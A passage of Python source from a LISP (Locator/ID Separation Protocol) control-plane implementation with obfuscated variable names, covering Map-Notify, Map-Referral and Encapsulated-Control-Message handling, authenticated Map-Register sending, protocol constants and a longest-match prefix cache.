        I11iiI1III.mapping_source = None if source == "lisp-itr" else source
        I11iiI1III.map_cache_ttl = o0o0Ooo0OO00o.store_ttl()
        I11iiI1III.subscribed_eid = o0oOOOOOO0OO
        I11iiI1III.subscribed_group = OOOo0Oooo

        #
        # No RLOC-records in the Map-Notify means remove the RLOC-set.
        #
        if (len(Iii11i1Ii) != 0 and o0o0Ooo0OO00o.rloc_count == 0):
            I11iiI1III.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, I11iiI1III)
            lprint("Update {} map-cache entry with no RLOC-set".format(
                green(i1iiii, False)))
            continue
        #
        # Decode each RLOC-record, reusing a deep copy of an existing RLOC
        # when the address is already in the saved RLOC-set.
        #
        I11Ii1I1I1111 = iiI1iIIIi1I1 = 0
        for I1I1II1iI in range(o0o0Ooo0OO00o.rloc_count):
            ooOoooO = lisp_rloc_record()
            O00o0Oo = ooOoooO.decode(O00o0Oo, None)
            ooOoooO.print_record(" ")

            III11i1 = False
            for iiiI1I in Iii11i1Ii:
                if (iiiI1I.rloc.is_exact_match(ooOoooO.rloc)):
                    III11i1 = True
                    break

            if (III11i1):
                iIIiI11 = copy.deepcopy(iiiI1I)
                iiI1iIIIi1I1 += 1
            else:
                iIIiI11 = lisp_rloc()
                I11Ii1I1I1111 += 1

            iIIiI11.store_rloc_from_record(ooOoooO, None, I11iiI1III.mapping_source)
            I11iiI1III.rloc_set.append(iIIiI11)

        lprint("Update {} map-cache entry with {}/{} new/replaced RLOCs".format(
            green(i1iiii, False), I11Ii1I1I1111, iiI1iIIIi1I1))

        #
        # Rebuild the best-RLOC list and tell the data-plane about the
        # updated map-cache entry.
        #
        I11iiI1III.build_best_rloc_set()
        lisp_write_ipc_map_cache(True, I11iiI1III)

    #
    # Ack the Map-Notify to the Map-Server it came from.
    #
    oO00000oOO = lisp_get_map_server(source)
    if (oO00000oOO == None):
        lprint("Cannot find Map-Server for Map-Notify source address {}".format(
            source.print_address_no_iid()))
        return
    lisp_send_map_notify_ack(lisp_sockets, O00o0Oo, i1111, oO00000oOO)
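#
# lisp_process_multicast_map_notify
#
# Process a Map-Notify for (S,G) entries. An entry is created only when
# gleaning allows it, gleaned entries are never overwritten, and only
# RLOC-records that carry an RLE are merged into the map-cache.
#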
def lisp_process_multicast_map_notify(packet, source):
    i1111 = lisp_map_notify("")
    packet = i1111.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return

    i1111.print_notify()
    if (i1111.record_count == 0): return

    O00o0Oo = i1111.eid_records

    for iIi1iIIIiIiI in range(i1111.record_count):
        o0o0Ooo0OO00o = lisp_eid_record()
        O00o0Oo = o0o0Ooo0OO00o.decode(O00o0Oo)

        #
        # Check the decode result itself for failure.
        #
        if (O00o0Oo == None): return
        o0o0Ooo0OO00o.print_record(" ", False)

        #
        # Find the (S,G) map-cache entry. Create one only when gleaning
        # is allowed for this EID.
        #
        I11iiI1III = lisp_map_cache_lookup(o0o0Ooo0OO00o.eid, o0o0Ooo0OO00o.group)
        if (I11iiI1III == None):
            iIiI1III, Oo0OoO00O, ii1I1I1iII = lisp_allow_gleaning(
                o0o0Ooo0OO00o.eid, o0o0Ooo0OO00o.group, None)
            if (iIiI1III == False): continue

            I11iiI1III = lisp_mapping(o0o0Ooo0OO00o.eid, o0o0Ooo0OO00o.group, [])
            I11iiI1III.add_cache()

        #
        # Gleaned entries are controlled by data-plane learning, not by
        # Map-Notifies.
        #
        if (I11iiI1III.gleaned):
            lprint("Ignore Map-Notify for gleaned {}".format(
                green(I11iiI1III.print_eid_tuple(), False)))
            continue

        I11iiI1III.mapping_source = None if source == "lisp-etr" else source
        I11iiI1III.map_cache_ttl = o0o0Ooo0OO00o.store_ttl()

        #
        # No RLOC-records means clear the RLOC-set for the entry.
        #
        if (len(I11iiI1III.rloc_set) != 0 and o0o0Ooo0OO00o.rloc_count == 0):
            I11iiI1III.rloc_set = []
            I11iiI1III.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, I11iiI1III)
            lprint("Update {} map-cache entry with no RLOC-set".format(
                green(I11iiI1III.print_eid_tuple(), False)))
            continue
        iIi11Ii = I11iiI1III.rtrs_in_rloc_set()

        #
        # Process each RLOC-record; only group entries with an RLE are
        # merged into the map-cache.
        #
        for I1I1II1iI in range(o0o0Ooo0OO00o.rloc_count):
            ooOoooO = lisp_rloc_record()
            O00o0Oo = ooOoooO.decode(O00o0Oo, None)
            ooOoooO.print_record(" ")
            if (o0o0Ooo0OO00o.group.is_null()): continue
            if (ooOoooO.rle == None): continue

            #
            # Carry packet counters over from the old first RLOC so the
            # statistics survive the replace.
            #
            IIIii1i = I11iiI1III.rloc_set[0].stats if \
                len(I11iiI1III.rloc_set) != 0 else None

            iIIiI11 = lisp_rloc()
            iIIiI11.store_rloc_from_record(ooOoooO, None,
                I11iiI1III.mapping_source)
            if (IIIii1i != None): iIIiI11.stats = copy.deepcopy(IIIii1i)

            if (iIi11Ii and iIIiI11.is_rtr() == False): continue

            I11iiI1III.rloc_set = [iIIiI11]
            I11iiI1III.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, I11iiI1III)

            lprint("Update {} map-cache entry with RLE {}".format(
                green(I11iiI1III.print_eid_tuple(), False),
                iIIiI11.rle.print_rle(False, True)))
    return
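#
# lisp_process_map_notify
#
# Process a Map-Notify from a Map-Server: authenticate it with the
# Map-Server's password, forward (S,G) records to the lisp-itr process
# over IPC, and answer with a Map-Notify-Ack.
#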
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
    i1111 = lisp_map_notify("")
    Oo00oo = i1111.decode(orig_packet)
    if (Oo00oo == None):
        lprint("Could not decode Map-Notify packet")
        return

    i1111.print_notify()

    #
    # When the Map-Notify is authenticated, find the Map-Server by source
    # address and verify the hash with its password.
    #
    I111 = source.print_address()
    if (i1111.alg_id != 0 or i1111.auth_len != 0):
        oO00000oOO = None
        for III in lisp_map_servers_list:
            if (III.find(I111) == -1): continue
            oO00000oOO = lisp_map_servers_list[III]
        if (oO00000oOO == None):
            lprint((" Could not find Map-Server {} to authenticate " +
                "Map-Notify").format(I111))
            return

        oO00000oOO.map_notifies_received += 1

        I1Iii1IIIiiiI = lisp_verify_auth(Oo00oo, i1111.alg_id,
            i1111.auth_data, oO00000oOO.password)

        lprint(" Authentication {} for Map-Notify".format("succeeded" if
            I1Iii1IIIiiiI else "failed"))
        if (I1Iii1IIIiiiI == False): return
    else:
        oO00000oOO = lisp_ms(I111, None, "", 0, "", False, False, False, False,
            0, 0, 0, None)

    #
    # A record-count of 0 just needs a Map-Notify-Ack.
    #
    O00o0Oo = i1111.eid_records
    if (i1111.record_count == 0):
        lisp_send_map_notify_ack(lisp_sockets, O00o0Oo, i1111, oO00000oOO)
        return
    #
    # Decode the EID-record and its RLOC-records for logging.
    #
    o0o0Ooo0OO00o = lisp_eid_record()
    Oo00oo = o0o0Ooo0OO00o.decode(O00o0Oo)
    if (Oo00oo == None): return

    o0o0Ooo0OO00o.print_record(" ", False)

    for I1I1II1iI in range(o0o0Ooo0OO00o.rloc_count):
        ooOoooO = lisp_rloc_record()
        Oo00oo = ooOoooO.decode(Oo00oo, None)
        if (Oo00oo == None):
            lprint(" Could not decode RLOC-record in Map-Notify packet")
            return
        ooOoooO.print_record(" ")

    #
    # Pass (S,G) Map-Notifies to the lisp-itr process so it can update
    # its map-cache.
    #
    if (o0o0Ooo0OO00o.group.is_null() == False):
        lprint("Send {} Map-Notify IPC message to ITR process".format(
            green(o0o0Ooo0OO00o.print_eid_tuple(), False)))

        OO = lisp_control_packet_ipc(orig_packet, I111, "lisp-itr", 0)
        lisp_ipc(OO, lisp_sockets[2], "lisp-core-pkt")

    #
    # Ack the Map-Notify.
    #
    lisp_send_map_notify_ack(lisp_sockets, O00o0Oo, i1111, oO00000oOO)
    return
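#
# lisp_process_map_notify_ack
#
# Process a Map-Notify-Ack: authenticate it with the site's registration
# key for the EID-prefix, then cancel retransmission and dequeue the
# pending Map-Notify it acknowledges.
#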
def lisp_process_map_notify_ack(packet, source):
    i1111 = lisp_map_notify("")
    packet = i1111.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify-Ack packet")
        return

    i1111.print_notify()

    #
    # An EID-record is needed to locate the site that authenticates the ack.
    #
    if (i1111.record_count < 1):
        lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
        return

    o0o0Ooo0OO00o = lisp_eid_record()

    if (o0o0Ooo0OO00o.decode(i1111.eid_records) == None):
        lprint("Could not decode EID-record, cannot authenticate " +
            "Map-Notify-Ack")
        return
    o0o0Ooo0OO00o.print_record(" ", False)

    i1iiii = o0o0Ooo0OO00o.print_eid_tuple()

    #
    # Authenticate the Map-Notify-Ack with the site's key for the key-id.
    #
    if (i1111.alg_id != LISP_NONE_ALG_ID and i1111.auth_len != 0):
        i1iI11i = lisp_sites_by_eid.lookup_cache(o0o0Ooo0OO00o.eid, True)
        if (i1iI11i == None):
            oo0oO0Oo = bold("Site not found", False)
            lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack").
                format(oo0oO0Oo, green(i1iiii, False)))
            return
        I1io0oOOooOoo0oO = i1iI11i.site

        I1io0oOOooOoo0oO.map_notify_acks_received += 1

        IiII11iI1 = i1111.key_id
        if (IiII11iI1 in I1io0oOOooOoo0oO.auth_key):
            I1Ii1II1I11II = I1io0oOOooOoo0oO.auth_key[IiII11iI1]
        else:
            I1Ii1II1I11II = ""

        I1Iii1IIIiiiI = lisp_verify_auth(packet, i1111.alg_id,
            i1111.auth_data, I1Ii1II1I11II)

        IiII11iI1 = "key-id {}".format(IiII11iI1) if IiII11iI1 == i1111.key_id \
            else "bad key-id {}".format(i1111.key_id)

        lprint(" Authentication {} for Map-Notify-Ack, {}".format(
            "succeeded" if I1Iii1IIIiiiI else "failed", IiII11iI1))
        if (I1Iii1IIIiiiI == False): return

    #
    # Cancel retransmission and dequeue the pending Map-Notify.
    #
    if (i1111.retransmit_timer): i1111.retransmit_timer.cancel()

    IiIi = source.print_address()
    III = i1111.nonce_key

    if (III in lisp_map_notify_queue):
        i1111 = lisp_map_notify_queue.pop(III)
        if (i1111.retransmit_timer): i1111.retransmit_timer.cancel()
        lprint("Dequeue Map-Notify from retransmit queue, key is: {}".format(
            III))
    else:
        lprint("Map-Notify with nonce 0x{} queue entry not found for {}".format(
            i1111.nonce_key, red(IiIi, False)))
    return
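#
# lisp_map_referral_loop
#
# DDT loop detection. A useful referral must be for a prefix that is
# more-specific than the last one cached for this Map-Request; return
# True when it is not, meaning the referral chase is looping.
#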
def lisp_map_referral_loop(mr, eid, group, action, s):
    if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
        LISP_DDT_ACTION_MS_REFERRAL)): return (False)

    if (mr.last_cached_prefix[0] == None): return (False)

    #
    # Compare the referral prefix with the previously cached one.
    #
    iiiIIi1I1I1 = False
    if (group.is_null() == False):
        iiiIIi1I1I1 = mr.last_cached_prefix[1].is_more_specific(group)
    if (iiiIIi1I1I1 == False):
        iiiIIi1I1I1 = mr.last_cached_prefix[0].is_more_specific(eid)

    if (iiiIIi1I1I1):
        o0oo0OO0oO = lisp_print_eid_tuple(eid, group)
        Ii1II1iiI1I = lisp_print_eid_tuple(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1])

        lprint(("Map-Referral prefix {} from {} is not more-specific " +
            "than cached prefix {}").format(green(o0oo0OO0oO, False), s,
            Ii1II1iiI1I))

    return (iiiIIi1I1I1)
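#
# lisp_process_map_referral
#
# Process a Map-Referral for an outstanding DDT Map-Request: update the
# referral-cache from each EID-record, then act on the referral action by
# following the referral, retrying at the root, or sending a negative
# Map-Reply to the requesting ITR.
#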
def lisp_process_map_referral(lisp_sockets, packet, source):

    iiIII111I111 = lisp_map_referral()
    packet = iiIII111I111.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Referral packet")
        return
    iiIII111I111.print_map_referral()

    I111 = source.print_address()
    o0Oo0o = iiIII111I111.nonce

    #
    # Process each EID-record in the Map-Referral.
    #
    for iIi1iIIIiIiI in range(iiIII111I111.record_count):
        o0o0Ooo0OO00o = lisp_eid_record()
        packet = o0o0Ooo0OO00o.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Referral packet")
            return
        o0o0Ooo0OO00o.print_record(" ", True)

        #
        # Match the nonce against an outstanding DDT Map-Request.
        #
        III = str(o0Oo0o)
        if (III not in lisp_ddt_map_requestQ):
            lprint(("Map-Referral nonce 0x{} from {} not found in " +
                "Map-Request queue, EID-record ignored").format(
                lisp_hex_string(o0Oo0o), I111))
            continue

        iii1i = lisp_ddt_map_requestQ[III]
        if (iii1i == None):
            lprint(("No Map-Request queue entry found for Map-Referral " +
                "nonce 0x{} from {}, EID-record ignored").format(
                lisp_hex_string(o0Oo0o), I111))
            continue

        #
        # Detect referral loops; give up on the Map-Request when looping.
        #
        if (lisp_map_referral_loop(iii1i, o0o0Ooo0OO00o.eid,
            o0o0Ooo0OO00o.group, o0o0Ooo0OO00o.action, I111)):
            iii1i.dequeue_map_request()
            continue

        iii1i.last_cached_prefix[0] = o0o0Ooo0OO00o.eid
        iii1i.last_cached_prefix[1] = o0o0Ooo0OO00o.group

        #
        # Find or create the referral-cache entry. Static entries are
        # never replaced.
        #
        iII11 = False
        oooo0o0o00o = lisp_referral_cache_lookup(o0o0Ooo0OO00o.eid,
            o0o0Ooo0OO00o.group, True)
        if (oooo0o0o00o == None):
            iII11 = True
            oooo0o0o00o = lisp_referral()
            oooo0o0o00o.eid = o0o0Ooo0OO00o.eid
            oooo0o0o00o.group = o0o0Ooo0OO00o.group
            if (o0o0Ooo0OO00o.ddt_incomplete == False): oooo0o0o00o.add_cache()
        elif (oooo0o0o00o.referral_source.not_set()):
            lprint("Do not replace static referral entry {}".format(
                green(oooo0o0o00o.print_eid_tuple(), False)))
            iii1i.dequeue_map_request()
            continue
        oOoO0OooO0O = o0o0Ooo0OO00o.action
        oooo0o0o00o.referral_source = source
        oooo0o0o00o.referral_type = oOoO0OooO0O
        O0O00O = o0o0Ooo0OO00o.store_ttl()
        oooo0o0o00o.referral_ttl = O0O00O
        oooo0o0o00o.expires = lisp_set_timestamp(O0O00O)

        #
        # Track up/down state of the referral-node this came from.
        #
        i11o00O0OO = oooo0o0o00o.is_referral_negative()
        if (I111 in oooo0o0o00o.referral_set):
            oooO00ooo00 = oooo0o0o00o.referral_set[I111]

            if (oooO00ooo00.updown == False and i11o00O0OO == False):
                oooO00ooo00.updown = True
                lprint("Change up/down status for referral-node {} to up".
                    format(I111))
            elif (oooO00ooo00.updown == True and i11o00O0OO == True):
                oooO00ooo00.updown = False
                lprint(("Change up/down status for referral-node {} " +
                    "to down, received negative referral").format(I111))

        #
        # Remember the current referral-set so stale nodes can be removed
        # after the RLOC-records are processed.
        #
        iIoooO00O0 = {}
        for III in oooo0o0o00o.referral_set: iIoooO00O0[III] = None

        #
        # Add or update referral-nodes from the RLOC-records.
        #
        for iIi1iIIIiIiI in range(o0o0Ooo0OO00o.rloc_count):
            ooOoooO = lisp_rloc_record()
            packet = ooOoooO.decode(packet, None)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Referral packet")
                return
            ooOoooO.print_record(" ")

            O0O0 = ooOoooO.rloc.print_address()
            if (O0O0 not in oooo0o0o00o.referral_set):
                oooO00ooo00 = lisp_referral_node()
                oooO00ooo00.referral_address.copy_address(ooOoooO.rloc)
                oooo0o0o00o.referral_set[O0O0] = oooO00ooo00
                if (I111 == O0O0 and i11o00O0OO): oooO00ooo00.updown = False
            else:
                oooO00ooo00 = oooo0o0o00o.referral_set[O0O0]
                if (O0O0 in iIoooO00O0): iIoooO00O0.pop(O0O0)

            oooO00ooo00.priority = ooOoooO.priority
            oooO00ooo00.weight = ooOoooO.weight

        #
        # Remove referral-nodes that were not present in this referral.
        #
        for III in iIoooO00O0: oooo0o0o00o.referral_set.pop(III)
        i1iiii = oooo0o0o00o.print_eid_tuple()

        if (iII11):
            if (o0o0Ooo0OO00o.ddt_incomplete):
                lprint("Suppress add {} to referral-cache".format(
                    green(i1iiii, False)))
            else:
                lprint("Add {}, referral-count {} to referral-cache".format(
                    green(i1iiii, False), o0o0Ooo0OO00o.rloc_count))
        else:
            lprint("Replace {}, referral-count: {} in referral-cache".format(
                green(i1iiii, False), o0o0Ooo0OO00o.rloc_count))

        #
        # Act on the referral action. A delegation-hole gets a negative
        # Map-Reply; not-authoritative retries at the root.
        #
        if (oOoO0OooO0O == LISP_DDT_ACTION_DELEGATION_HOLE):
            lisp_send_negative_map_reply(iii1i.lisp_sockets, oooo0o0o00o.eid,
                oooo0o0o00o.group, iii1i.nonce, iii1i.itr, iii1i.sport, 15,
                None, False)
            iii1i.dequeue_map_request()

        if (oOoO0OooO0O == LISP_DDT_ACTION_NOT_AUTH):
            if (iii1i.tried_root):
                lisp_send_negative_map_reply(iii1i.lisp_sockets,
                    oooo0o0o00o.eid, oooo0o0o00o.group, iii1i.nonce,
                    iii1i.itr, iii1i.sport, 0, None, False)
                iii1i.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(iii1i, True)

        if (oOoO0OooO0O == LISP_DDT_ACTION_MS_NOT_REG):
            if (I111 in oooo0o0o00o.referral_set):
                oooO00ooo00 = oooo0o0o00o.referral_set[I111]
                oooO00ooo00.updown = False

            if (len(oooo0o0o00o.referral_set) == 0):
                iii1i.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(iii1i, False)

        if (oOoO0OooO0O in (LISP_DDT_ACTION_NODE_REFERRAL,
            LISP_DDT_ACTION_MS_REFERRAL)):
            if (iii1i.eid.is_exact_match(o0o0Ooo0OO00o.eid)):
                if (not iii1i.tried_root):
                    lisp_send_ddt_map_request(iii1i, True)
                else:
                    lisp_send_negative_map_reply(iii1i.lisp_sockets,
                        oooo0o0o00o.eid, oooo0o0o00o.group, iii1i.nonce,
                        iii1i.itr, iii1i.sport, 15, None, False)
                    iii1i.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(iii1i, False)

        if (oOoO0OooO0O == LISP_DDT_ACTION_MS_ACK): iii1i.dequeue_map_request()
    return
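#
# lisp_process_ecm
#
# Process an Encapsulated-Control-Message. The only inner message accepted
# is a Map-Request, which is handed to lisp_process_map_request() along
# with the ECM's inner source address and UDP source port.
#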
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
    III1iI1III1I1 = lisp_ecm(0)
    packet = III1iI1III1I1.decode(packet)
    if (packet == None):
        lprint("Could not decode ECM packet")
        return

    III1iI1III1I1.print_ecm()

    IiIii1iIIII = lisp_control_header()
    if (IiIii1iIIII.decode(packet) == None):
        lprint("Could not decode control header")
        return

    oO0Oo0oO00O = IiIii1iIIII.type
    del(IiIii1iIIII)

    if (oO0Oo0oO00O != LISP_MAP_REQUEST):
        lprint("Received ECM without Map-Request inside")
        return

    #
    # Hand the inner Map-Request to the Map-Request processing code with
    # the ECM's inner source and source port.
    #
    o000O000o0O = III1iI1III1I1.udp_sport
    iIIi1iiii1ii = time.time()
    lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
        III1iI1III1I1.source, o000O000o0O, III1iI1III1I1.ddt, -1, iIIi1iiii1ii)
    return
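#
# lisp_send_map_register
#
# Authenticate and send a Map-Register to a Map-Server. When an encryption
# key is configured for the Map-Server, everything after the first 4 bytes
# of the message is ChaCha20-encrypted before it is sent.
#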
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):

    #
    # In a LISP-Decent push configuration, the first Map-Register for a
    # multicast peer-group is bootstrapped through the loopback address.
    #
    IIi11ii = ms.map_server
    if (lisp_decent_push_configured and IIi11ii.is_multicast_address() and
        (ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
        IIi11ii = copy.deepcopy(IIi11ii)
        IIi11ii.address = 0x7f000001
        I11 = bold("Bootstrap", False)
        Oo = ms.map_server.print_address_no_iid()
        lprint("{} mapping system for peer-group {}".format(I11, Oo))

    #
    # Compute the authentication hash over the Map-Register.
    #
    packet = lisp_compute_auth(packet, map_register, ms.password)

    #
    # Optionally encrypt everything after the first 4 bytes with ChaCha20.
    #
    if (ms.ekey != None):
        iiIio0o0 = ms.ekey.zfill(32)
        OoOooO = "0" * 8
        iiIi = chacha.ChaCha(iiIio0o0, OoOooO, 20).encrypt(packet[4::])
        packet = packet[0:4] + iiIi
        oO0ooOOO = bold("Encrypt", False)
        lprint("{} Map-Register with key-id {}".format(oO0ooOOO, ms.ekey_id))

    IIIII1I11ii = ""
    if (lisp_decent_pull_xtr_configured()):
        IIIII1I11ii = ", decent-index {}".format(bold(ms.dns_name, False))

    lprint("Send Map-Register to map-server {}{}{}".format(
        IIi11ii.print_address(), ", ms-name '{}'".format(ms.ms_name),
        IIIII1I11ii))
    lisp_send(lisp_sockets, IIi11ii, LISP_CTRL_PORT, packet)
    return
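#
# lisp_send_ipc_to_core
#
# Hand a control packet to the lisp-core process over IPC; lisp-core owns
# the LISP control port and does the actual transmission.
#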
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
    O0oo0OoO0oo = lisp_socket.getsockname()
    dest = dest.print_address_no_iid()

    lprint("Send IPC {} bytes to {} {}, control-packet: {}".format(
        len(packet), dest, port, lisp_format_packet(packet)))

    packet = lisp_control_packet_ipc(packet, O0oo0OoO0oo, dest, port)
    lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
    return
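#
# The three senders below (Map-Reply, Map-Referral, Map-Notify) are thin
# wrappers that log the destination and pass the packet to lisp-core via
# lisp_send_ipc_to_core().
#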
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
    lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
    lprint("Send Map-Referral to {}".format(dest.print_address()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
    lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
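#
# lisp_send_ecm
#
# Prepend an ECM header to a control message and send it to the outer
# destination on the LISP control port. Under NAT-traversal, the inner
# source port is rewritten to a translated port so replies return through
# the NAT.
#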
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
    outer_dest, to_etr=False, to_ms=False, ddt=False):

    if (inner_source == None or inner_source.is_null()):
        inner_source = inner_dest

    #
    # When behind a NAT, use a translated port as the inner source port.
    #
    if (lisp_nat_traversal):
        oooooO0oO0ooO = lisp_get_any_translated_port()
        if (oooooO0oO0ooO != None): inner_sport = oooooO0oO0ooO

    III1iI1III1I1 = lisp_ecm(inner_sport)

    III1iI1III1I1.to_etr = to_etr if lisp_is_running("lisp-etr") else False
    III1iI1III1I1.to_ms = to_ms if lisp_is_running("lisp-ms") else False
    III1iI1III1I1.ddt = ddt
    ooIiii = III1iI1III1I1.encode(packet, inner_source, inner_dest)
    if (ooIiii == None):
        lprint("Could not encode ECM message")
        return
    III1iI1III1I1.print_ecm()

    packet = ooIiii + packet

    O0O0 = outer_dest.print_address_no_iid()
    lprint("Send Encapsulated-Control-Message to {}".format(O0O0))
    IIi11ii = lisp_convert_4to6(O0O0)
    lisp_send(lisp_sockets, IIi11ii, LISP_CTRL_PORT, packet)
    return
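#
# Address-family constants. The negative AFI values are internal to this
# implementation (real AFIs are non-negative). They are followed by RLOC
# up/down state codes, authentication-type codes, and per-AFI host
# mask-lengths.
#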
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387

LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5

LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3

LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
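#
# byte_swap_64
#
# Reverse the byte order of a 64-bit value. Worked example:
# byte_swap_64(0x0102030405060708) returns 0x0807060504030201.
#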
def byte_swap_64(address):
    IiI = (((address & 0x00000000000000ff) << 56) |
           ((address & 0x000000000000ff00) << 40) |
           ((address & 0x0000000000ff0000) << 24) |
           ((address & 0x00000000ff000000) << 8)  |
           ((address & 0x000000ff00000000) >> 8)  |
           ((address & 0x0000ff0000000000) >> 24) |
           ((address & 0x00ff000000000000) >> 40) |
           ((address & 0xff00000000000000) >> 56))
    return (IiI)
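#
# lisp_cache / lisp_cache_entries
#
# A two-level longest-match cache. The first level is keyed by mask-length
# (offset by 48 for real AFIs so the internal IID-range keys sort first)
# and kept sorted for longest-match walks; the second level is keyed by
# the string <instance-id><afi><address> in zero-filled hex. Illustrative
# example: an IPv4 /24 EID maps to first-level key 24 + 48 = 72.
#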
class lisp_cache_entries(object):
    def __init__(self):
        self.entries = {}
        self.entries_sorted = []
class lisp_cache(object):
    def __init__(self):
        self.cache = {}
        self.cache_sorted = []
        self.cache_count = 0

    def cache_size(self):
        return(self.cache_count)

    def build_key(self, prefix):
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
            ml = 0
        elif (prefix.afi == LISP_AFI_IID_RANGE):
            ml = prefix.mask_len
        else:
            ml = prefix.mask_len + 48

        iid = lisp_hex_string(prefix.instance_id).zfill(8)
        afi = lisp_hex_string(prefix.afi).zfill(4)

        if (prefix.afi > 0):
            if (prefix.is_binary()):
                length = prefix.addr_length() * 2
                addr = lisp_hex_string(prefix.address).zfill(length)
            else:
                addr = prefix.address
        elif (prefix.afi == LISP_AFI_GEO_COORD):
            afi = "8003"
            addr = prefix.address.print_geo()
        else:
            afi = ""
            addr = ""

        key = iid + afi + addr
        return([ml, key])

    def add_cache(self, prefix, entry):
        if (prefix.is_binary()): prefix.zero_host_bits()
        ml, key = self.build_key(prefix)
        if (ml not in self.cache):
            self.cache[ml] = lisp_cache_entries()
            self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
        if (key not in self.cache[ml].entries):
            self.cache_count += 1
        self.cache[ml].entries[key] = entry

    def lookup_cache(self, prefix, exact):
        ml, key = self.build_key(prefix)
        if (exact):
            if (ml not in self.cache): return(None)
            if (key not in self.cache[ml].entries): return(None)
            return(self.cache[ml].entries[key])

        #
        # Longest match: walk mask-lengths in ascending order and remember
        # the most-specific covering entry found so far.
        #
        found = None
        for mask_len in self.cache_sorted:
            if (ml < mask_len): return(found)
            for entry in list(self.cache[mask_len].entries.values()):
                if (prefix.is_more_specific(entry.eid)):
                    if (found == None or
                        entry.eid.is_more_specific(found.eid)): found = entry
        return(found)

    def delete_cache(self, prefix):
        ml, key = self.build_key(prefix)
        if (ml not in self.cache): return
        if (key not in self.cache[ml].entries): return
        self.cache[ml].entries.pop(key)
        self.cache_count -= 1

    def walk_cache(self, function, parms):
        for ml in self.cache_sorted:
            for entry in list(self.cache[ml].entries.values()):
                status, parms = function(entry, parms)
                if (status == False): return(parms)
        return(parms)

    def sort_in_entry(self, table, value):
        if (table == []): return([value])

        #
        # Binary-search insertion that keeps 'table' sorted ascending.
        #
        sublist = table
        while (True):
            if (len(sublist) == 1):
                if (value == sublist[0]): return(table)
                index = table.index(sublist[0])
                if (value < sublist[0]):
                    return(table[0:index] + [value] + table[index::])
                if (value > sublist[0]):
                    return(table[0:index+1] + [value] + table[index+1::])
            index = old_div(len(sublist), 2)
            sublist = sublist[0:index] if (value < sublist[index]) else \
                sublist[index::]
        return([])

    def print_cache(self):
        lprint("Printing contents of {}: ".format(self))
        if (self.cache_size() == 0):
            lprint(" Cache is empty")
            return
        for ml in self.cache_sorted:
            for key in self.cache[ml].entries:
                entry = self.cache[ml].entries[key]
                lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
                    entry))
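
#
# Minimal usage sketch for lisp_cache (illustrative, not from the original
# source). lookup_cache() expects stored entries to carry their prefix in an
# 'eid' attribute, so a hypothetical stub object is used here:
#
#   cache = lisp_cache()
#   eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#   eid.store_prefix("[0]10.0.0.0/8")
#   class entry_stub(object): pass
#   entry = entry_stub(); entry.eid = eid
#   cache.add_cache(eid, entry)
#
#   host = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 0)
#   assert cache.lookup_cache(host, False) is entry   # longest match
#   assert cache.lookup_cache(host, True) is None     # no exact /32 entry
#
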
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache()

def lisp_map_cache_lookup(source, dest):

    multicast = dest.is_multicast_address()

    #
    # Look up destination EID in the map-cache.
    #
    mc = lisp_map_cache.lookup_cache(dest, False)
    if (mc == None):
        eid_str = source.print_sg(dest) if multicast else dest.print_address()
        eid_str = green(eid_str, False)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)

    #
    # Unicast lookup is done here. For multicast, the (S,G) entry hangs off
    # the group entry's source-cache.
    #
    if (multicast == False):
        prefix_str = green(mc.eid.print_prefix(), False)
        dprint("Lookup for EID {} found map-cache entry {}".format(
            green(dest.print_address(), False), prefix_str))
        return(mc)

    #
    # Multicast lookup: find source entry within the group entry.
    #
